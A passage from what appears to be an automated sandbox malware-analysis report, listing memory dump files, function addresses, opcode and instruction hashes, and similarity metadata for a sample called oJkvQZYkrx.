                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction ID: 76a81ae40ac285f52442b5ccfc98e4227c9900bd8896681c25e381f763309985
                                                          • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction Fuzzy Hash: 0BF08C33A20B340B6360CC7A8D05097A2C797C86B0B0FC969ECA0E7206E930EC0656D1
                                                          Function 00A39980 Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b39d7b9474dfdfbe2ea9f076ce6dc1738c1abe26cf2ed1008bd8847e9375b17
                                                          • Instruction ID: 8c3935af37c826f75d3a16564946818a92c476a7bbadfda46109134338cc09b6
                                                          • Opcode Fuzzy Hash: 1b39d7b9474dfdfbe2ea9f076ce6dc1738c1abe26cf2ed1008bd8847e9375b17
                                                          • Instruction Fuzzy Hash: DDB012319012004F5B06CA36EC7119332B273D6300755C4ECE10349020D676D0068600
                                                          Function 008B6810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [
                                                          • API String ID: 0-784033777
                                                          • Opcode ID: 3b6d7cf10ee5d81e7a50afe8cc9a2c42a5bde6c2c853337cb89dd4e7fd194db0
                                                          • Instruction ID: 0afe771c83443e2ede316c13af2da95e41807fcbd4c42bd4d182a70d28130540
                                                          • Opcode Fuzzy Hash: 3b6d7cf10ee5d81e7a50afe8cc9a2c42a5bde6c2c853337cb89dd4e7fd194db0
                                                          • Instruction Fuzzy Hash: A6B169719083965BDB358A2488917FBBFE8FF55324F18052EE8C5C6382FB2DC8648752
                                                          Function 00BDB180 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: islower
                                                          • String ID: $
                                                          • API String ID: 3326879001-3993045852
                                                          • Opcode ID: 18ba9fa8bab586d7f32a82e34484789797b07a257a6a49381d64b3f4f747a4c4
                                                          • Instruction ID: b2089c7be903872ae84c819b26af860c3c78d954bfa003c1dd18fc200c310dd1
                                                          • Opcode Fuzzy Hash: 18ba9fa8bab586d7f32a82e34484789797b07a257a6a49381d64b3f4f747a4c4
                                                          • Instruction Fuzzy Hash: 8C61C130608345CBC7149F69C880A2EFBE2EFC9364F154AAFE4958B391F770D8459B46